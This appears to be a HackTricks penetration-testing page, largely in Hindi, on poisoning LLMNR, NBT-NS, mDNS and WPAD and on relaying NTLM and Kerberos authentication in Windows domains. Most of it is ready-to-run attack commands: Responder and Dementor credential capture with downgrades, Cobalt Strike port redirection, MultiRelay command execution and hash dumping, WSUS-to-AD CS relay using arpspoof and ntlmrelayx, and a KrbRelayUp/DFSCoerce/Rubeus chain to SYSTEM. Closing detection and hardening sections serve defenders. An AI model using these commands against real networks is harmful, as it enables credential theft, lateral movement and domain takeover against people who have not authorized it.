Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

नेटवर्क प्रोटोकॉल

स्थानीय होस्ट रेज़ॉल्यूशन प्रोटोकॉल

  • LLMNR, NBT-NS, and mDNS:
  • Microsoft और अन्य ऑपरेटिंग सिस्टम DNS के विफल होने पर लोकल नाम समाधान के लिए LLMNR और NBT-NS का उपयोग करते हैं। इसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।
  • ये प्रोटोकॉल उनकी अनप्रमाणीकृत, ब्रॉडकास्ट प्रकृति के कारण UDP पर इंटरसेप्शन और spoofing के प्रति संवेदनशील हैं।
  • Responder और Dementor का उपयोग उन होस्ट्स को फ़ोर्ज्ड रिस्पॉन्स भेजकर सेवाओं को impersonate करने के लिए किया जा सकता है जो इन प्रोटोकॉल्स को क्वेरी कर रहे हैं।
  • Responder का उपयोग करके service impersonation के बारे में और जानकारी यहाँ मिल सकती है here.

Web Proxy Auto-Discovery Protocol (WPAD)

  • WPAD ब्राउज़रों को proxy सेटिंग्स स्वचालित रूप से खोजने की अनुमति देता है।
  • खोज DHCP, DNS के माध्यम से की जाती है, या DNS विफल होने पर LLMNR और NBT-NS पर fallback होती है।
  • Responder WPAD attacks को automate कर सकता है, क्लाइंट्स को malicious WPAD servers की ओर निर्देशित करते हुए।

Responder/Dementor for Protocol Poisoning

  • Responder एक टूल है जिसका उपयोग LLMNR, NBT-NS, और mDNS क्वेरीज को poisoning करने के लिए किया जाता है, क्वेरी प्रकारों के आधार पर चयनात्मक रूप से उत्तर देते हुए, मुख्य रूप से SMB सेवाओं को target करते हुए।

  • यह Kali Linux में pre-installed आता है, और /etc/responder/Responder.conf पर configure किया जा सकता है।

  • Responder captured hashes को स्क्रीन पर दिखाता है और उन्हें /usr/share/responder/logs डायरेक्टरी में सेव करता है।

  • यह IPv4 और IPv6 दोनों को support करता है।

  • Responder का Windows संस्करण यहाँ उपलब्ध है here.

  • Dementor multicast poisoning के विषयों का विस्तार करता है और अतिरिक्त रूप से rogue service provider के रूप में कार्य करता है (CUPS RCE सपोर्ट सहित)।

  • कुल मिलाकर संरचना Responder के समान है पर अधिक granular configuration के साथ। (default is here: Dementor.toml)

  • Dementor और Responder के बीच compatibility यहाँ दी गई है: Compatibility Matrix

  • Intro और Documentation यहाँ: Dementor - Docs

  • यह कुछ प्रोटोकॉल पर Responder द्वारा पेश capture issues को fix करता है

Responder चलाना

  • Default settings के साथ Responder चलाने के लिए: responder -I <Interface>
  • अधिक aggressive probing (संभावित side effects के साथ) के लिए: responder -I <Interface> -P -r -v
  • आसान cracking के लिए NTLMv1 challenges/responses capture करने की तकनीकें: responder -I <Interface> --lm --disable-ess
  • WPAD impersonation को सक्रिय करने के लिए: responder -I <Interface> --wpad
  • NetBIOS requests को attacker के IP पर resolve किया जा सकता है, और एक authentication proxy सेटअप किया जा सकता है: responder.py -I <interface> -Pv

Dementor चलाना

  • detault settings के साथ: Dementor -I <interface>
  • analysis mode में default settings के साथ: Dementor -I <interface> -A
  • Automatic NTLM session downgrade (ESS): Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off
  • कस्टम config के साथ वर्तमान सेशन चलाने के लिए: Dementor -I <interface> --config <file.toml>

DHCP Poisoning with Responder

  • Spoofing DHCP responses शिकार के routing information को स्थायी रूप से poison कर सकता है, जो ARP poisoning के मुकाबले एक अधिक stealthier विकल्प प्रदान करता है।
  • इसके लिए target नेटवर्क की configuration का सटीक ज्ञान आवश्यक है।
  • हमले को चलाने के लिए: ./Responder.py -I eth0 -Pdv
  • यह विधि प्रभावी रूप से NTLMv1/2 hashes capture कर सकती है, लेकिन नेटवर्क disruption से बचने के लिए सावधानीपूर्वक हैंडलिंग आवश्यक है।

Responder/Dementor के साथ Credentials capture करना

  • Responder/Dementor उपरोक्त प्रोटोकॉल्स का उपयोग करके सेवाओं की impersonate करेगा, और जब कोई उपयोगकर्ता spoofed सेवाओं के खिलाफ authenticate करने का प्रयास करता है तो credentials capture करेगा (आम तौर पर NTLMv2 Challenge/Response)।
  • आसान credential cracking के लिए NetNTLMv1 पर downgrade करने या ESS को disable करने के प्रयास किए जा सकते हैं।

यदि आपके पास पहले से ही लिखने योग्य SMB शेयर जिसे पीड़ित ब्राउज़ करते हैं, तो आप spoofing किए बिना outbound SMB को बाध्य कर सकते हैं UNC-based lure files (SCF/LNK/library-ms/desktop.ini/Office) plant करके जो ntlm_theft से generate किए गए हैं, और फिर authentication को Responder के साथ पकड़ सकते हैं। देखिये the Explorer-triggered UNC lure workflow.

यह याद रखना महत्वपूर्ण है कि इन techniques का उपयोग कानूनी और नैतिक रूप से किया जाना चाहिए, उचित प्राधिकरण सुनिश्चित करते हुए और disruption या अनधिकृत पहुँच से बचते हुए।

Inveigh

Inveigh Windows सिस्टम्स के लिए penetration testers और red teamers के लिए एक टूल है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, spoofing और man-in-the-middle attacks करता है। यह टूल PowerShell script से C# binary में विकसित हुआ है, मुख्य संस्करणों के रूप में Inveigh और InveighZero उपलब्ध हैं। विशद पैरामीटर्स और निर्देश wiki में मिल सकते हैं।

Inveigh PowerShell के माध्यम से संचालित किया जा सकता है:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

या C# बाइनरी के रूप में निष्पादित:

Inveigh.exe

NTLM Relay Attack

यह हमला SMB authentication sessions का उपयोग करके लक्ष्य मशीन तक पहुँच बनाता है, और सफल होने पर system shell प्रदान करता है। प्रमुख पूर्वशर्तें निम्न हैं:

  • प्रमाणीकृत उपयोगकर्ता के पास relayed host पर Local Admin access होना चाहिए।
  • SMB signing निष्क्रिय होना चाहिए।

445 पोर्ट फ़ॉरवर्डिंग और टनलिंग

ऐसे परिदृश्यों में जहाँ सीधे नेटवर्क कनेक्शन संभव नहीं है, port 445 पर ट्रैफ़िक को फॉरवर्ड और टनल करना ज़रूरी होता है। PortBender जैसे टूल port 445 ट्रैफ़िक को किसी अन्य पोर्ट पर redirect करने में मदद करते हैं, जो तब आवश्यक होता है जब local admin access ड्राइवर लोडिंग के लिए उपलब्ध हो।

PortBender setup and operation in Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

NTLM Relay Attack के लिए अन्य टूल

  • Metasploit: proxies, local और remote host विवरणों के साथ कॉन्फ़िगर करें।
  • smbrelayx: relaying SMB sessions और commands execute करने या backdoors deploy करने के लिए एक Python स्क्रिप्ट।
  • MultiRelay: Responder suite का एक टूल जो specific users या सभी users को relay करने, commands execute करने, या hashes dump करने के लिए है।

प्रत्येक टूल को यदि आवश्यक हो तो SOCKS proxy के माध्यम से काम करने के लिए कॉन्फ़िगर किया जा सकता है, जिससे अप्रत्यक्ष नेटवर्क एक्सेस के साथ भी हमले संभव हो पाते हैं।

MultiRelay संचालन

MultiRelay को /usr/share/responder/tools डायरेक्टरी से चलाया जाता है और यह विशिष्ट IPs या users को लक्षित करता है।

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

RelayKing – relayable लक्ष्यों की खोज और curated relay सूचियाँ

RelayKing एक NTLM relay exposure auditor है जो मैप करता है कि relays कहाँ viable हैं और ntlmrelayx.py -tf के लिए ready-to-use target lists बनाता है। यह protocol hardening (SMB signing/channel binding; HTTP/HTTPS/MSSQL/LDAP/LDAPS EPA/CBT; RPC auth) को जांचता है और coercion/reflection helpers (PetitPotam/PrinterBug/DFSCoerce, WebClient/WebDAV, NTLMv1, CVE-2025-33073 reflection) को flag करता है।

  • Auth HTTPS/LDAPS CBT और MSSQL EPA checks की reliability बेहतर करता है; SMB signing/signature level को बिना authentication के probe किया जाता है।
  • Cross-protocol relay pathing confirmed Net-NTLMv1 (--ntlmv1/--ntlmv1-all) findings का उपयोग करता है; प्रत्येक path के लिए severity ranking प्रदान की जाती है।
  • --gen-relay-list <file> grep-friendly target list ntlmrelayx.py -tf <file> के लिए लिखता है ताकि trial-and-error से बचा जा सके।
  • --coerce-all सभी targets के खिलाफ PetitPotam/DFSCoerce/PrinterBug को mass-trigger करता है; --ntlmv1-all (RemoteRegistry) और --audit (domain-wide LDAP host pull) शोरगुल वाले हैं और कई लॉगऑन/रिमोट एक्सेस उत्पन्न करते हैं।
  • --proto-portscan बंद पोर्ट्स को स्किप करके स्कैनिंग को तेज करता है; --krb-dc-only तब मदद करता है जब DCs NTLM को ब्लॉक करते हैं लेकिन अन्य services अभी भी इसे स्वीकार करते हैं।

Example sweeps:

# Authenticated audit across multiple protocols + generate relay list for ntlmrelayx
python3 relayking.py -u lowpriv -p 'P@ssw0rd!' -d lab.local --dc-ip 10.0.0.10 \
--audit --protocols smb,ldap,ldaps,mssql,http,https --proto-portscan --ntlmv1 \
--threads 10 -vv -o plaintext,json --output-file relayking-scan --gen-relay-list relaytargets.txt

# Unauthenticated CIDR sweep for SMB/LDAP/HTTP relayability
python3 relayking.py --null-auth --protocols smb,ldap,http --proto-portscan -o plaintext 10.10.0.0/24

These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.

Abusing WSUS HTTP (8530) for NTLM Relay to LDAP/SMB/AD CS (ESC8)

WSUS clients authenticate to their update server using NTLM over HTTP (8530) or HTTPS (8531). When HTTP is enabled, periodic client check-ins can be coerced or intercepted on the local segment and relayed with ntlmrelayx to LDAP/LDAPS/SMB or AD CS HTTP endpoints (ESC8) without cracking any hashes. This blends into normal update traffic and frequently yields machine-account authentications (HOST$).

क्या देखना है

  • GPO/registry configuration under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate and …\WindowsUpdate\AU:
  • WUServer (e.g., http://wsus.domain.local:8530)
  • WUStatusServer (reporting URL)
  • UseWUServer (1 = WSUS; 0 = Microsoft Update)
  • DetectionFrequencyEnabled and DetectionFrequency (hours)
  • WSUS SOAP endpoints used by clients over HTTP:
  • /ClientWebService/client.asmx (approvals)
  • /ReportingWebService/reportingwebservice.asmx (status)
  • Default ports: 8530/tcp HTTP, 8531/tcp HTTPS

Reconnaissance

  • Unauthenticated
  • Scan for listeners: nmap -sSVC -Pn –open -p 8530,8531 -iL
  • Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
  • Authenticated
  • Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
  • Query endpoints at scale from hosts (NetExec) or locally: nxc smb -u -p -M reg-query -o PATH=“HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate” KEY=“WUServer” reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate

End-to-end HTTP relay steps

  1. Position for MITM (same L2) so a client resolves the WSUS server to you (ARP/DNS poisoning, Bettercap, mitm6, etc.). Example with arpspoof: arpspoof -i -t <wsus_client_ip> <wsus_server_ip>

  2. Redirect port 8530 to your relay listener (optional, convenient): iptables -t nat -A PREROUTING -p tcp –dport 8530 -j REDIRECT –to-ports 8530 iptables -t nat -L PREROUTING –line-numbers

  3. Start ntlmrelayx with the HTTP listener (requires Impacket support for HTTP listener; see PRs below): ntlmrelayx.py -t ldap:// -smb2support -socks –keep-relaying –http-port 8530

Other common targets:

  • Relay to SMB (if signing off) for exec/dump: -t smb://
  • Relay to LDAPS for directory changes (e.g., RBCD): -t ldaps://
  • Relay to AD CS web enrollment (ESC8) to mint a cert and then authenticate via Schannel/PKINIT: ntlmrelayx.py –http-port 8530 -t http:///certsrv/certfnsh.asp –adcs –no-http-server For deeper AD CS abuse paths and tooling, see the AD CS page:

AD CS Domain Escalation

  1. Trigger a client check-in or wait for schedule. From a client: wuauclt.exe /detectnow or use the Windows Update UI (Check for updates).

  2. Use the authenticated SOCKS sessions (if -socks) or direct relay results for post-exploitation (LDAP changes, SMB ops, or AD CS certificate issuance for later authentication).

HTTPS constraint (8531)

  • Passive interception of WSUS over HTTPS is ineffective unless clients trust your certificate. Without a trusted cert or other TLS break, the NTLM handshake can’t be harvested/relayed from WSUS HTTPS traffic.

Notes

  • WSUS was announced deprecated but remains widely deployed; HTTP (8530) is still common in many environments.
  • Useful helpers: wsusniff.py (observe HTTP WSUS check-ins), wsuspider.sh (enumerate WUServer/WUStatusServer from GPOs), NetExec reg-query at scale.
  • Impacket restored HTTP listener support for ntlmrelayx in PR #2034 (originally added in PR #913).

Force NTLM Logins

In Windows you may be able to force some privileged accounts to authenticate to arbitrary machines. Read the following page to learn how:

Force NTLM Privileged Authentication

Kerberos Relay attack

A Kerberos relay attack steals an AP-REQ ticket from one service and re-uses it against a second service that shares the same computer-account key (because both SPNs sit on the same $ machine account). This works even though the SPNs’ service classes differ (e.g. CIFS/LDAP/) because the key that decrypts the ticket is the machine’s NT hash, not the SPN string itself and the SPN string is not part of the signature.

Unlike NTLM relay, the hop is limited to the same host but, if you target a protocol that lets you write to LDAP, you can chain into Resource-Based Constrained Delegation (RBCD) or AD CS enrollment and pop NT AUTHORITY\SYSTEM in a single shot.

For detailed info about this attack check:

TokenPurposeRelay relevance
TGT / AS-REQ ↔ REPProves the user to the KDCuntouched
Service ticket / TGS-REQ ↔ REPBound to one SPN; encrypted with the SPN owner’s keyinterchangeable if SPNs share account
AP-REQClient sends TGS to the servicewhat we steal & replay
  • Tickets are encrypted with the password-derived key of the account that owns the SPN.
  • The Authenticator inside the AP-REQ has a 5-minute timestamp; replay inside that window is valid until the service cache sees a duplicate.
  • Windows rarely checks if the SPN string in the ticket matches the service you hit, so a ticket for CIFS/HOST normally decrypts fine on LDAP/HOST.
    1. What must be true to relay Kerberos
  1. Shared key: source and target SPNs belong to the same computer account (default on Windows servers).
  2. No channel protection: SMB/LDAP signing off and EPA off for HTTP/LDAPS.
  3. You can intercept or coerce authentication: LLMNR/NBNS poison, DNS spoof, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, etc..
  4. Ticket source not already used: you win the race before the real packet hits or block it entirely; otherwise the server’s replay cache fires Event 4649.
  5. You need to somehow be able to perform a MitM in the communication maybe being part of the DNSAmins group to modify the DNS of the domain or being able to change the HOST file of the victim.

Kerberos Relay Steps

  • 3.1 Recon the host
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
  • 3.2 relay listener शुरू करें

KrbRelayUp

# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

KrbRelayUp एक बाइनरी में KrbRelay → LDAP → RBCD → Rubeus → SCM bypass को लपेटता है।

  • 3.3 Coerce Kerberos auth
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50

DFSCoerce DC को हमें Kerberos CIFS/DC01 टिकट भेजवाता है।

  • 3.4 AP-REQ को रिले करें

KrbRelay SMB से GSS blob निकालता है, इसे LDAP bind में फिर पैकेज करता है, और इसे ldap://DC01 पर फॉरवर्ड करता है—प्रमाणीकरण सफल हो जाता है क्योंकि वही कुंजी इसे डीक्रिप्ट कर देती है।

  • 3.5 LDAP ➜ RBCD ➜ SYSTEM का दुरुपयोग
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe

आपके पास अब NT AUTHORITY\SYSTEM है।

जानने लायक और रास्ते

VectorTrickWhy it matters
AuthIP / IPSecनकली सर्वर किसी भी SPN के साथ एक GSS-ID payload भेजता है; क्लाइंट सीधे आपके लिए एक AP-REQ बनाता हैयह सबनेट्स के पार भी काम करता है; डिफ़ॉल्ट रूप से machine creds का उपयोग करता है
DCOM / MSRPCMalicious OXID resolver क्लाइंट को किसी भी SPN और पोर्ट पर auth करने के लिए मजबूर करता हैशुद्ध local priv-esc; फ़ायरवॉल को बायपास करता है
AD CS Web Enrollमशीन टिकट को HTTP/CA पर relay करके एक cert प्राप्त करें, फिर PKINIT से TGTs mint करेंLDAP signing defenses को बायपास करता है
Shadow CredentialsmsDS-KeyCredentialLink लिखें, फिर नकली key pair के साथ PKINIT करेंकंप्यूटर अकाउंट जोड़ने की आवश्यकता नहीं

समस्या निवारण

ErrorMeaningFix
KRB_AP_ERR_MODIFIEDTicket key ≠ target keyगलत host/SPN
KRB_AP_ERR_SKEWClock > 5 min offsetसमय सिंक करें या w32tm का उपयोग करें
LDAP bind failsSigning लागू हैAD CS path का उपयोग करें या signing को अक्षम करें
Event 4649 spamService ने duplicate Authenticator देखामूल पैकेट को block करें या उससे race करें

डिटेक्शन

  • कुछ सेकंड के भीतर एक ही स्रोत से CIFS/, HTTP/, LDAP/ के लिए Event 4769 में बढ़ोतरी।
  • सर्विस पर Event 4649 replay का पता लगने का संकेत है।
  • 127.0.0.1 से Kerberos logon (लोकल SCM पर relay) बहुत संदिग्ध है — KrbRelayUp docs में Sigma rule से मैप करें।
  • msDS-AllowedToActOnBehalfOfOtherIdentity या msDS-KeyCredentialLink attributes में परिवर्तन पर नज़र रखें।

हार्डनिंग

  1. हर सर्वर पर LDAP & SMB signing + EPA लागू करें।
  2. Split SPNs रखें ताकि HTTP वही अकाउंट पर न हो जो CIFS/LDAP के लिए है।
  3. coercion vectors (PetitPotam KB5005413, DFS, AuthIP) को patch करें।
  4. अनाधिकृत कंप्यूटर जॉइन को रोकने के लिए ms-DS-MachineAccountQuota = 0 सेट करें।
  5. Event 4649 और अनपेक्षित loopback Kerberos logons पर अलर्ट सेट करें।

References

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें